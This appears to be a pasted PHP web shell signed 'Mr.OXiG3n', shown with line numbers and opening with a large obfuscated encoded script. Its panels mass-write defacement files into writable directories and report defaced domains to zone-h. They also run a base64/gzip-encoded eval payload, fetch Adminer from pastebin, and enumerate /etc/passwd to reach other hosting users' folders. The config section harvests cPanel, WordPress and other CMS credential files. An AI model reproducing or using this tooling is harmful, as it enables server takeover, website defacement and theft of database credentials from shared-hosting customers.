70%35%1e%5a%64%5d%58%5d%60%3a%02%06%77%04%05%2c%5f%68%6c%68%67%61%2c%5b%67%60%5c%20%69%60%63%6a%68%30%34%51%5a%5a%65%69%58%1e%77%00%07%14%16%5f%6e%63%6c%5f%65%6f%38%12%1a%4c%5f%62%59%52%6d%10%69%66%60%55%12%59%66%60%5d%6f%16%34%03%02%17%13%52%65%6e%61%60%59%75%39%11%67%66%63%64%6c%59%20%5f%60%67%5f%6a%34%03%02%17%13%50%5d%5e%64%5d%68%63%64%63%5c%32%17%67%69%60%58%5e%6a%25%5b%61%5e%5c%63%5c%61%62%1a%6f%60%64%22%12%12%5b%37%5e%30%59%39%26%13%1c%5f%2b%59%22%5a%2d%23%32%00%08%12%13%5f%65%68%5e%54%6f%36%14%28%63%66%12%6e%60%60%61%5e%1f%1c%37%33%30%36%0d%04%13%11%5a%67%6c%53%5a%6e%27%69%5c%52%65%68%6c%32%16%2f%6f%69%35%07%01%13%1e%62%5c%5d%58%61%60%56%37%10%2f%67%6b%1e%2a%63%69%31%05%04%1f%11%61%6f%6b%67%69%60%58%37%14%64%63%6d%5a%35%07%01%13%1e%6b%5b%66%68%5d%21%62%61%5f%59%5c%35%1e%60%62%68%6a%59%62%3a%02%06%14%17%20%67%59%5d%64%63%6a%21%64%6c%5b%6a%24%6e%55%66%58%5c%68%30%12%6d%60%62%5f%32%00%08%12%13%5c%6f%68%6f%6e%6f%36%14%67%62%69%60%6f%5a%6a%33%01%09%11%10%68%5c%6b%62%21%6e%59%5b%5a%63%66%37%10%2b%67%6b%1e%2d%63%69%14%1b%58%55%5b%35%07%01%13%1e%58%62%63%68%25%6b%54%66%59%5c%6b%35%1e%2b%23%21%31%05%04%1f%11%5a%65%65%6f%2d%6f%64%77%5f%30%12%20%21%60%68%32%00%08%71%00%07%26%5b%69%62%6d%61%67%24%59%69%66%58%22%63%64%62%64%6d%36%5c%66%69%55%6c%35%37%5a%5d%58%6e%6f%5b%14%72%00%08%12%13%5f%65%68%5e%54%6f%23%59%66%67%6f%6c%35%11%5a%62%5d%52%64%35%07%01%70%0d%04%21%5c%6f%6b%6e%6e%62%23%5e%60%67%55%21%64%63%64%6d%6e%39%5e%5d%68%60%69%55%34%35%5f%5f%5c%63%61%5a%10%71%04%05%1e%12%5d%5e%59%63%5b%61%60%6b%66%5b%35%1e%21%6a%5a%5a%63%65%63%22%64%63%65%58%51%6c%20%58%6a%59%5e%68%5a%62%68%1f%6f%6f%62%27%11%19%5d%2f%54%2c%5b%29%23%13%13%58%34%5b%33%5c%35%28%34%03%02%74%00%08%20%68%61%14%73%01%09%06%5d%65%63%62%60%34%6d%5a%58%33%01%09%72%03%02%63%64%1e%77%00%07%03%5a%65%62%61%64%5b%70%35%1e%65%61%65%63%64%59%3a%02%06%03%64%5c%60%5b%64%63%32%16%29%6f%69%35%07%01%04%6e%5d%5f%5d%63%64%5b%39%11%2b%64%6f%36%0d%04%70%02%02%59%12%7a%02%06%03%5a%62%6a%63%6d%37%14%1b%58%55%5b%5a%5e%5d%36%0d%04%04%6d%5f%6e%6e%2c%5d%5b%59%66%6d%51%6e%64%60%66%30%12%6d%60%62%5f%32%00%08%71%00%07%5b%30%5a%6e%6b%5b%6a%17%76%0d%04%04%5c%65%62%63%61%37%10%59%70%5c%6c%37%00%07%03%6a%59%67%6d%23%58%5c%5e%6f%6c%5c%6d%63%67%60%39%11%6b%66%5b%58%60%66%64%63%5f%33%01%09%72%03%02%59%13%7b%01%05%06%59%67%66%6e%6f%36%14%5a%74%51%60%36%02%02%75%01%09%61%6e%5f%17%76%0d%04%04%5b%65%64%6e%2c%6c%67%72%5c%35%1e%2d%2e%61%6c%33%01%09%72%03%02%6b%5c%50%66%58%25%14%6a%5a%2b%11%6c%58%17%76%0d%04%04%5f%65%68%5e%54%6f%23%59%66%67%6a%5d%63%6c%5f%30%5f%6e%65%64%5b%67%6e%55%37%00%07%03%58%5d%52%64%59%6a%66%68%6c%5e%35%11%68%68%5d%6d%6c%60%5b%69%58%6c%6e%36%02%02%01%58%6e%63%6c%27%5d%5c%6d%65%67%76%32%16%1b%44%5f%6b%66%6b%68%1e%61%62%63%65%1f%37%0c%07%07%5e%66%61%62%21%6e%66%72%5d%34%1f%2e%2d%64%6f%36%0d%04%70%02%02%24%6e%50%5f%64%5f%56%5b%6f%61%58%25%14%24%6e%57%50%58%65%64%58%2a%12%21%6d%58%57%5a%6e%62%5b%14%72%00%08%05%5d%60%6a%5a%59%61%37%10%2b%67%6b%1e%6f%62%65%63%5a%12%12%5b%5a%5e%5d%59%54%37%00%07%77%05%04%2d%6d%58%55%5f%62%6d%59%13%74%07%00%05%52%60%64%65%69%35%1e%1f%2e%3e%3e%31%38%35%34%03%02%00%5d%6f%6c%5f%5a%6a%30%12%21%61%68%14%6a%62%6a%65%5f%11%5a%62%69%54%34%03%02%74%00%08%20%6f%5d%55%5e%63%6c%5a%24%14%25%6f%52%53%5b%60%67%5d%12%3d%11%5f%14%72%00%08%05%5e%60%60%67%6c%39%11%69%5c%60%6f%55%37%00%07%77%05%04%2d%6d%5c%55%5f%62%6d%59%27%11%26%6a%5e%5e%59%61%67%5c%13%7b%01%05%06%59%67%66%6e%6f%36%14%6e%5b%69%6e%58%34%07%00%05%51%60%6e%58%5c%6d%38%12%2c%61%6c%16%6f%6e%65%67%58%17%5d%6a%69%58%34%07%00%71%0c%07%22%68%5b%52%56%63%60%5a%14%34%12%50%37%58%65%6d%58%60%12%76%02%02%01%5f%6e%65%61%6a%31%13%57%63%67%5d%31%05%04%7c%02%06%68%5f%13%7b%01%05%06%64%59%5e%53%66%62%5d%31%13%21%22%63%69%31%05%04%7c%02%06%68%69%35%56%63%69%5a%6a%16%77%0c%07%07%5a%58%5e%6b%5b%6d%60%6f%64%5e%39%11%6e%5f%5b%36%0d%04%04%5c%65%62%63%61%37%10%19%5d%59%54%58%59%5b%31%05%04%7c%02%06%63%65%63%65%6e%56%6d%73%66%59%3c%6d%5b%6c%6b%50%2a%12%64%63%64%6d%6e%5a%6d%77%64%5c%30%6e%5d%6e%6c%6d%67%6c%53%52%24%14%25%64%6c%62%68%6d%14%73%01%09%06%5e%5b%5a%66%57%6c%62%6a%66%5a%34%1f%6d%6e%5b%65%6e%6e%5d%6d%5a%66%6a%37%1f%02%06%03%5a%62%6a%63%6d%37%14%1b%58%55%5b%5a%5e%5d%36%0d%04%04%5f%65%68%5e%54%6f%36%14%28%63%66%12%6e%60%60%61%5e%1f%1c%5a%5e%5d%59%54%58%36%02%02%01%62%50%5d%5c%63%65%5a%38%12%2e%61%6c%33%01%09%06%5a%65%65%6f%2d%58%5c%62%63%62%75%39%11%19%4f%59%68%6c%6e%68%18%31%05%04%08%5b%61%66%6b%20%63%65%75%5a%32%16%2d%22%61%68%31%04%05%7d%01%05%66%66%66%69%63%54%6c%73%67%58%3d%6f%68%5f%67%61%6e%5c%11%75%07%01%04%6e%5d%5f%5d%63%64%5b%39%11%2e%64%6f%36%7d%01%05%66%66%66%69%63%54%6c%73%67%58%3d%6f%68%5f%67%61%6e%5c%37%58%65%6d%58%60%12%76%02%02%01%5f%64%6f%6d%65%69%35%1e%62%62%66%66%6a%59%61%34%03%02%74%00%08%65%61%61%6f%6a%34%55%60%5d%6f%6a%27%1e%6e%58%69%68%59%6c%54%5e%36%5e%66%5e%65%6f%13%74%07%00%12%1f%60%6b%68%63%64%6c%59%35%11%24%33%01%09%11%10%5a%66%6d%52%59%6d%22%59%67%66%6e%6f%36%14%1a%59%54%58%59%5b%5e%33%01%09%72%03%02%6b%58%66%6e%5c%6f%5f%59%12%7a%02%06%03%59%62%60%5e%58%6f%32%16%2d%6f%69%10%69%66%67%69%5e%13%1c%5e%5c%58%55%5b%5a%31%04%05%09%6b%64%5d%68%5e%34%1f%2e%20%24%1c%36%0d%04%04%59%5f%61%5b%57%6d%36%14%2b%23%2e%62%6b%34%07%00%05%6f%5e%5c%58%60%61%57%21%67%5a%5e%6a%34%1f%2a%60%6c%32%00%08%05%60%5e%6a%5f%65%6d%37%10%2b%27%63%66%12%5c%6a%68%67%37%0c%07%07%6a%5c%6e%69%74%58%37%14%64%63%6d%5a%35%07%01%04%50%5d%5e%64%5d%68%63%64%63%5c%32%17%6f%60%5d%61%6c%64%59%6c%54%63%6c%31%04%05%09%5f%62%65%65%68%34%1f%1c%5a%5e%5d%59%54%58%36%02%02%01%58%6e%63%6c%27%5d%5c%6d%65%67%76%32%16%1b%44%5f%6b%66%6b%68%17%37%00%07%03%5c%63%6d%6d%23%69%60%75%55%34%13%2e%29%66%6a%3a%02%06%77%04%05%69%58%6d%5e%67%5d%12%7a%02%06%03%6e%64%52%6e%5b%37%14%29%22%2f%1a%35%07%01%04%6d%65%61%22%5c%5d%65%56%59%6c%32%17%28%2e%22%63%69%31%05%04%7c%02%06%30%26%6e%62%75%67%5a%36%05%04%3b%20%58%5f%58%5f%3c%01%05%35%5a%67%5e%78%33%03%02%33%5e%55%60%6f%5a%6a%34%01%09%06%34%64%69%58%3c%01%05%06%03%05%04%08%06%03%02%04%05%5f%53%52%50%55%16%12%5e%50%51%14%17%52%5f%53%52%11%55%57%53%5e%50%10%14%17%13%1e%12%13%11%14%57%53%5e%50%10%14%56%13%1e%12%13%11%14%16%12%1f%11%51%14%56%00%08%12%22%11%55%16%56%1f%55%21%14%1f%52%29%23%13%50%55%57%76%5e%50%51%14%26%13%5f%12%52%50%14%16%12%2e%11%51%55%56%77%7a%12%77%50%55%16%12%1f%50%51%55%73%13%7a%12%77%02%02%72%12%7b%11%74%14%53%13%1e%23%77%11%70%16%76%1f%11%51%14%17%77%5f%12%57%75%14%1f%53%1f%55%10%14%53%52%5f%53%13%55%70%16%1b%5e%11%54%14%26%13%5f%12%57%11%70%16%76%0c%07%74%14%73%52%7a%12%22%11%14%52%76%1f%75%10%70%56%77%1e%76%52%50%55%21%12%7b%11%74%14%73%13%7a%12%13%50%55%57%25%1f%75%10%70%17%77%1e%76%13%11%55%57%23%1f%75%10%70%04%05%1e%56%52%50%55%27%53%2e%55%51%50%56%77%5a%53%52%50%55%72%53%5e%50%51%25%73%52%7a%12%77%50%70%16%76%5e%50%51%55%26%77%5f%76%13%75%55%72%56%5e%50%51%70%56%77%5f%76%00%07%07%00%05%08%02%06%03%00%00%08%05%37%20%64%68%59%3d%02%06%30%26%5e%55%60%6f%5a%6a%34%01%09%35%21%5c%28%3115393699%37%33%30%34%39%35%34' + unescape('%27%29%29%3b'));
  95. // -->
  96. </script>
  97. <noscript><i>Javascript required</i></noscript>
  98. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  99. <tr class="aw"><td><font color="white">Path :</font>
  100. <?php
  101. if(isset($_GET['path'])){
  102. $directory = $_GET['path'];
  103. }else{
  104. $directory = getcwd();
  105. }
  106. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  107. $ver = phpversion();
  108. $kernel = php_uname();
  109. $ip_web = gethostbyname($_SERVER['HTTP_HOST']);
  110. $ds = @ini_get("disable_functions");
  111. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=aqua>Clear</font>";
  112. $directory = str_replace('\\','/',$directory);
  113. $paths = explode('/',$directory);
  114. $ds = @ini_get("disable_functions");
  115. $show_ds = (!empty($ds)) ? "<a href='?path=$directory&to=disabfunc' class='ds'><font color=red>Yes</font></a>" : "<a href='?path=$directory&to=disabfunc'><font color=green>NONE</font></a>";
  116. $mail = (function_exists('mail')) ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
  117. $d0mains = @file("/etc/named.conf", false);
  118. if (!$d0mains){
  119. $dom = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
  120. $GLOBALS["need_to_update_header"] = "true";
  121. }else{
  122. $count = 0;
  123. foreach ($d0mains as $d0main){
  124. if (@strstr($d0main, "zone")){
  125. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  126. flush();
  127. if (strlen(trim($domains[1][0])) > 2){
  128. flush();
  129. $count++;
  130. }
  131. }
  132. }
  133. $dom = "$count Domain";
  134. }
  135. $total = disk_total_space($directory);
  136. $free = disk_free_space($directory);
  137. $pers = (int) ($free/$total*100);
  138. function formatSize( $bytes ){
  139. $types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
  140. for( $i = 0; $bytes >= 1024 && $i < ( count( $types ) -1 ); $bytes /= 1024, $i++ );
  141. return( round( $bytes, 2 )." ".$types[$i] );
  142. }
  143.  
  144. foreach($paths as $id=>$pat){
  145. if($pat == '' && $id == 0){
  146. $a = true;
  147. echo '<a href="?path=/">$=> </a>';
  148. continue;
  149. }
  150. if($pat == '') continue;
  151. echo '<a href="?path=';
  152. for($i=0;$i<=$id;$i++){
  153. echo "$paths[$i]";
  154. if($i != $id) echo "/";
  155. }
  156. echo '">'.$pat.'</a>/';
  157. }
  158. echo "<br>";
  159. echo "Mailer : <font size=2 color=aqua>".$mail."</font><br>";
  160. echo "Disable : <font size=2 color=aqua> ".$show_ds."</font><br>";
  161. echo "HDD : <font size=2 color=aqua>Total : ".formatSize($total)." Free : ".formatSize($free)." [".$pers."%]</font><br>";
  162. echo "System : <font size=2 color=aqua>".$kernel."</font><br>";
  163. echo "<br>";
  164. echo '</td></tr><tr class="aw"><td>';
  165. if($_GET['to'] == 'mass') {
  166. function sabun_massal($directory,$namafile,$isi_script) {
  167. if(is_writable($directory)) {
  168. $dira = scandir($directory);
  169. foreach($dira as $dirb) {
  170. $dirc = "$directory/$dirb";
  171. $lokasi = $dirc.'/'.$namafile;
  172. if($dirb === '.') {
  173. file_put_contents($lokasi, $isi_script);
  174. } elseif($dirb === '..') {
  175. file_put_contents($lokasi, $isi_script);
  176. } else {
  177. if(is_dir($dirc)) {
  178. if(is_writable($dirc)) {
  179. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  180. file_put_contents($lokasi, $isi_script);
  181. $idx = sabun_massal($dirc,$namafile,$isi_script);
  182. }
  183. }
  184. }
  185. }
  186. }
  187. }
  188. function sabun_biasa($directory,$namafile,$isi_script) {
  189. if(is_writable($directory)) {
  190. $dira = scandir($directory);
  191. foreach($dira as $dirb) {
  192. $dirc = "$directory/$dirb";
  193. $lokasi = $dirc.'/'.$namafile;
  194. if($dirb === '.') {
  195. file_put_contents($lokasi, $isi_script);
  196. } elseif($dirb === '..') {
  197. file_put_contents($lokasi, $isi_script);
  198. } else {
  199. if(is_dir($dirc)) {
  200. if(is_writable($dirc)) {
  201. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  202. file_put_contents($lokasi, $isi_script);
  203. }
  204. }
  205. }
  206. }
  207. }
  208. }
  209. if($_POST['start']) {
  210. if($_POST['tipe_sabun'] == 'mahal') {
  211. echo "<div style='margin: 5px auto; padding: 5px'>";
  212. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  213. echo "</div>";
  214. } elseif($_POST['tipe_sabun'] == 'murah') {
  215. echo "<div style='margin: 5px auto; padding: 5px'>";
  216. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  217. echo "</div>";
  218. }
  219. } else {
  220. echo "<center>";
  221. echo "<form method='post'>
  222. <font style='text-decoration: underline;'>Tipe Mass:</font><br>
  223. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  224. <font style='text-decoration: underline;'>Folder:</font><br>
  225. <input type='text' name='d_dir' value='$directory' style='width: 450px;' height='10'><br>
  226. <font style='text-decoration: underline;'>Filename:</font><br>
  227. <input type='text' name='d_file' value='dit14.php' style='width: 450px;' height='10'><br>
  228. <font style='text-decoration: underline;'>Index File:</font><br>
  229. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.OXiG3n | INDONESIAN ERROR SYSTEM</textarea><br>
  230. <input type='submit' name='start' value='HAJAR COK!' style='width: 450px;'>
  231. </form></center>";
  232. }
  233. } elseif($_GET['to'] == 'zoneh') {
  234. if($_POST['submit']) {
  235. $domain = explode("\r\n", $_POST['url']);
  236. $nick = $_POST['nick'];
  237. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=".htmlspecialchars($nick)."/published=0</a><br>";
  238. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=".htmlspecialchars($nick)."</a><br><br>";
  239. function zoneh($url,$nick) {
  240. $ch = curl_init("http://www.zone-h.com/notify/single");
  241. curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  242. curl_setopt($ch, CURLOPT_POST, TRUE);
  243. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  244. return curl_exec($ch);
  245. curl_close($ch);
  246. }
  247. foreach($domain as $url) {
  248. $zoneh = zoneh($url,$nick);
  249. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  250. echo "".htmlspecialchars($url)." -> <font color=lime>OK</font><br>";
  251. } else {
  252. echo "".htmlspecialchars($url)." -> <font color=red>ERROR</font><br>";
  253. }
  254. }
  255. } else {
  256. echo "<center><h2>Zone-H</h2></center><center><form method='post'>
  257. <u>Defacer</u>: <br>
  258. <input type='text' name='nick' size='50' value='Mr.OXiG3n'><br>
  259. <u>Domains</u>: <br>
  260. <textarea placeholder='http://oxig3n.gov' style='width: 450px; height: 150px;' name='url'></textarea><br>
  261. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  262. </form>";
  263. }
  264. } elseif($_GET['to'] == 'sym') {
  265. echo '<hr>';
  266. eval(gzinflate(base64_decode('7Vdtb9s2EP5uwP/hyniQtLiS7aBrEVtuuibDCmwN0KTbgKQwZImKtNCiQNKR3TT/fUfKUlzZyZClxQpsAWLIvFcd757n3InnjIEPUomJoDkLQmp3JidH7347endmHR6/fv/r0dvTybvj41PrQxcI6UInD1TiDNutTtSbBWkm0fwgThm1iUdV6GXBjEZuyLOYaK2dnUQpdCvbrTS2Kxvnut06mF1GqbAJX6QXe9lELmek23v+/Lm2OgiTpswc0wUNbcIyeCrBA8G5MucdHX8PE7GOc5VyzOlNFqGuhJ84Y7w4Wc5+SbNLzOEwFTRUXCyNApT+3UTN2q1XUXS6zCkoulAeliLNwM2THIzk5yCLGBVNYbt1EqhUxkt4lS0tk0mu84h5TjPbQsdBiO8ura5VWGWmhZEXIlVYatTulsk7w4M4ZFyWh1qVhgkH0m6NVDBlFAKWXmR+SDOFaUy5iKjw9/Diloz6VpFGKtn/offdsJQ8DTnjYn/nxY89/BtaY+1GmM+osik192GQL0BylkYwZXM6tD6LNB7FPFNg3PksnVGQ6UfqD8YnLrzl7sjT4vHIU9GXdH7ITZd8Je/vJRVfyzd2GsNOa3j3sPbEjEzI52jnQx+/xVzQIEzqoYBAwupZzweOCxX0IrXJR55R0q1EznWOx5NZoMJkEjBmWztaAYjtfu+QHatbOdEPZSF1O8VsLhNbP6FjnHeGDapEOrMrpbP+h7PeB8eBMQx0/M4c64Sp5lymi8kFVXkxTyPbzDovMipWA3+FhQkklR5xm67qLsbma9QPC1PWcFU4Ai5U5XHRYON6SnNGYzwNIBE09hFZ8n3PK4rCbcZ2iVfdEQuk9NVCjTd16ijBWiStp1/9zNJQZhm1WlaFtjoaOb1bfPI0GHkJn1Fvw97L51OWhhOEGWaBCgQW07cmUxZkl9ZGms0WWuW2aiJYv8lVwXZ3hzc3N3WtPQMYpuFuKJNU3+Xp0cmpX8K0ZW4tx3BFZJX9ALZR+Ieo/M2DMvwdKsM9sIzSJjJDBc1wDzb3xyXigm7e8nYtFU10h2zFEjMHe1tx9YEutuDbQ5PYRLEaw+BzEANTp7q4ZK25cFkggjjABdBFqmzyPjPVUhy0LmjDJ6ZVoEh0Zz6JKccdQZ87uheho5eLGKdFrk5NQIN8VIsCIYKlXZ7qhG6BEbv83ENAfOmc7597ntSoKLu1bdPR+v5DyiHu4rJTaSBeGItb5KwdIVr2B/DpE2wIfB96WnAbxgcyTTOycahL9ke/78VyU3YVCI+lUy+7SxiIvNBH26UXPE+o2JTJrYkYf9FsUzCX6ArR7I4cYpVvf6tsm0BbIGZvF5j1kThYbFwhVZoh9dYDpwfqIY28hVUeNA1r1KH9VKlWjsh6ZtH9DireuI82GjHWWWODNOoJDe4YT80JNWxVo9MkiJIe9F7OJTzBG/g9zSJeSOJc380DW1lAb+YbHHDLABj7gSTQ6734Aujfbj0a/+8B/+quk0HVTZcDxvb2okF9QXBCxRUVIy8ZjL8KX7w5/Ka5QtFZjoUlZNjBPbGPjz3zNND0oX+aoBLuwfZKPPLBSMuvu7sOXHdw6dQ/MRtrqFFYgTKuL3jklMFcH/7kKV7zvtU1xy45z7DVq5uzRlPhja1hlVq5A+svq4Z9hocmK8Nnikrl4gQjHxQlV8X5vOKjZ92VoT5eG7Zn6GqNJSuK3Ob1URS5yY9fhhz/Z8b/MjM+mgkfRK3/CjM25nULOY68KL3Cz1XWZDjPtNu10TVGN6ApFG7Nt0Hk6yDLOL4z/txXFJqAWUfQ7sr/l+O/AA==')));
  267. } elseif($_GET['to'] == 'adm') {
  268. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $directory);
  269. function adminer($url, $isi){
  270. $fp = fopen($isi, "w");
  271. $ch = curl_init();
  272. curl_setopt($ch, CURLOPT_URL, $url);
  273. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  274. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  275. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  276. curl_setopt($ch, CURLOPT_FILE, $fp);
  277. return curl_exec($ch);
  278. curl_close($ch);
  279. fclose($fp);
  280. ob_flush();
  281. flush();
  282. }
  283. if(file_exists('adminer.php')){
  284. echo "<a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  285. }else{
  286. if(adminer("https://pastebin.com/raw/rqG5s4rS","adminer.php")){
  287. echo "<p>Berhasil Membuat Adminer</p><a href='$full/adminer.php' target='_blank' class='text-center btn btn-success btn-block mb-3'>Login Adminer</a>";
  288. }else{
  289. echo "<p class='text-danger'>Gagal Membuat Adminer</p>";
  290. }
  291. }
  292. } elseif($_GET['to'] == 'jumping') {
  293. $i = 0;
  294. echo "<div class='margin: 5px auto;'>";
  295. if(preg_match("/hsphere/", $directory)) {
  296. $urls = explode("\r\n", $_POST['url']);
  297. if(isset($_POST['jump'])) {
  298. echo "<pre>";
  299. foreach($urls as $url) {
  300. $url = str_replace(array("http://","www."), "", strtolower($url));
  301. $etc = "/etc/passwd";
  302. $f = fopen($etc,"r");
  303. while($gets = fgets($f)) {
  304. $pecah = explode(":", $gets);
  305. $user = $pecah[0];
  306. $dir_user = "/hsphere/local/home/$user";
  307. if(is_dir($dir_user) === true) {
  308. $url_user = $dir_user."/".$url;
  309. if(is_readable($url_user)) {
  310. $i++;
  311. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  312. if(is_writable($url_user)) {
  313. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  314. }
  315. echo $jrw."<br>";
  316. }
  317. }
  318. }
  319. }
  320. if($i == 0) {
  321. } else {
  322. echo "<br>Total ada ".$i." Kamar di ".$ip;
  323. }
  324. echo "</pre>";
  325. } else {
  326. echo '<center>
  327. <form method="post">
  328. List Domains: <br>
  329. <textarea name="url" style="width: 500px; height: 250px;">';
  330. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  331. while($getss = fgets($fp)) {
  332. echo $getss;
  333. }
  334. echo '</textarea><br>
  335. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  336. </form></center>';
  337. }
  338. } elseif(preg_match("/vhosts|vhost/", $directory)) {
  339. preg_match("/\/var\/www\/(.*?)\//", $directory, $vh);
  340. $urls = explode("\r\n", $_POST['url']);
  341. if(isset($_POST['jump'])) {
  342. echo "<pre>";
  343. foreach($urls as $url) {
  344. $url = str_replace("www.", "", $url);
  345. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  346. if(is_dir($web_vh) === true) {
  347. if(is_readable($web_vh)) {
  348. $i++;
  349. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  350. if(is_writable($web_vh)) {
  351. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  352. }
  353. echo $jrw."<br>";
  354. }
  355. }
  356. }
  357. if($i == 0) {
  358. } else {
  359. echo "<br>Total ada ".$i." Kamar di ".$ip;
  360. }
  361. echo "</pre>";
  362. } else {
  363. echo '<center>
  364. <form method="post">
  365. List Domains: <br>
  366. <textarea name="url" style="width: 500px; height: 250px;">';
  367. bing("ip:$ip");
  368. echo '</textarea><br>
  369. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  370. </form></center>';
  371. }
  372. } else {
  373. echo "<pre>";
  374. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  375. while($passwd = fgets($etc)) {
  376. if($passwd == '' || !$etc) {
  377. echo "<font color=red>Can't read /etc/passwd</font>";
  378. } else {
  379. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  380. foreach($user_jumping[1] as $user_idx_jump) {
  381. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  382. if(is_readable($user_jumping_dir)) {
  383. $i++;
  384. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  385. if(is_writable($user_jumping_dir)) {
  386. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  387. }
  388. echo $jrw;
  389. if(function_exists('posix_getpwuid')) {
  390. $domain_jump = file_get_contents("/etc/named.conf");
  391. if($domain_jump == '') {
  392. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  393. } else {
  394. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  395. foreach($domains_jump[1] as $dj) {
  396. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  397. $user_jumping_url = $user_jumping_url['name'];
  398. if($user_jumping_url == $user_idx_jump) {
  399. echo " => ( <u>$dj</u> )<br>";
  400. break;
  401. }
  402. }
  403. }
  404. } else {
  405. echo "<br>";
  406. }
  407. }
  408. }
  409. }
  410. }
  411. if($i == 0) {
  412. } else {
  413. echo "<br>Total ada ".$i." Kamar di ".$ip;
  414. }
  415. echo "</pre>";
  416. }
  417. echo "</div>";
  418. } elseif($_GET['to'] == 'config') {
  419. if($_POST){
  420. $passwd = $_POST['passwd'];
  421. mkdir("indosec_config", 0777);
  422. $isi_htc = "Options allnRequire NonenSatisfy Any";
  423. $htc = fopen("indosec_config/.htaccess","w");
  424. fwrite($htc, $isi_htc);
  425. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  426. foreach($user_config[1] as $user_con){
  427. $user_config_dir = "/home/$user_con/public_html/";
  428. if(is_readable($user_config_dir)){
  429. $grab_config = array(
  430. "/home/$user_con/.my.cnf" => "cpanel",
  431. "/home/$user_con/public_html/config/koneksi.php" => "Lokomedia",
  432. "/home/$user_con/public_html/forum/config.php" => "phpBB",
  433. "/home/$user_con/public_html/sites/default/settings.php" => "Drupal",
  434. "/home/$user_con/public_html/config/settings.inc.php" => "PrestaShop",
  435. "/home/$user_con/public_html/app/etc/local.xml" => "Magento",
  436. "/home/$user_con/public_html/admin/config.php" => "OpenCart",
  437. "/home/$user_con/public_html/application/config/database.php" => "Ellislab",
  438. "/home/$user_con/public_html/vb/includes/config.php" => "Vbulletin",
  439. "/home/$user_con/public_html/includes/config.php" => "Vbulletin",
  440. "/home/$user_con/public_html/forum/includes/config.php" => "Vbulletin",
  441. "/home/$user_con/public_html/forums/includes/config.php" => "Vbulletin",
  442. "/home/$user_con/public_html/cc/includes/config.php" => "Vbulletin",
  443. "/home/$user_con/public_html/inc/config.php" => "MyBB",
  444. "/home/$user_con/public_html/includes/configure.php" => "OsCommerce",
  445. "/home/$user_con/public_html/shop/includes/configure.php" => "OsCommerce",
  446. "/home/$user_con/public_html/os/includes/configure.php" => "OsCommerce",
  447. "/home/$user_con/public_html/oscom/includes/configure.php" => "OsCommerce",
  448. "/home/$user_con/public_html/products/includes/configure.php" => "OsCommerce",
  449. "/home/$user_con/public_html/cart/includes/configure.php" => "OsCommerce",
  450. "/home/$user_con/public_html/inc/conf_global.php" => "IPB",
  451. "/home/$user_con/public_html/wp-config.php" => "Wordpress",
  452. "/home/$user_con/public_html/wp/test/wp-config.php" => "Wordpress",
  453. "/home/$user_con/public_html/blog/wp-config.php" => "Wordpress",
  454. "/home/$user_con/public_html/beta/wp-config.php" => "Wordpress",
  455. "/home/$user_con/public_html/portal/wp-config.php" => "Wordpress",
  456. "/home/$user_con/public_html/site/wp-config.php" => "Wordpress",
  457. "/home/$user_con/public_html/wp/wp-config.php" => "Wordpress",
  458. "/home/$user_con/public_html/WP/wp-config.php" => "Wordpress",
  459. "/home/$user_con/public_html/news/wp-config.php" => "Wordpress",
  460. "/home/$user_con/public_html/wordpress/wp-config.php" => "Wordpress",
  461. "/home/$user_con/public_html/test/wp-config.php" => "Wordpress",
  462. "/home/$user_con/public_html/demo/wp-config.php" => "Wordpress",
  463. "/home/$user_con/public_html/home/wp-config.php" => "Wordpress",
  464. "/home/$user_con/public_html/v1/wp-config.php" => "Wordpress",
  465. "/home/$user_con/public_html/v2/wp-config.php" => "Wordpress",
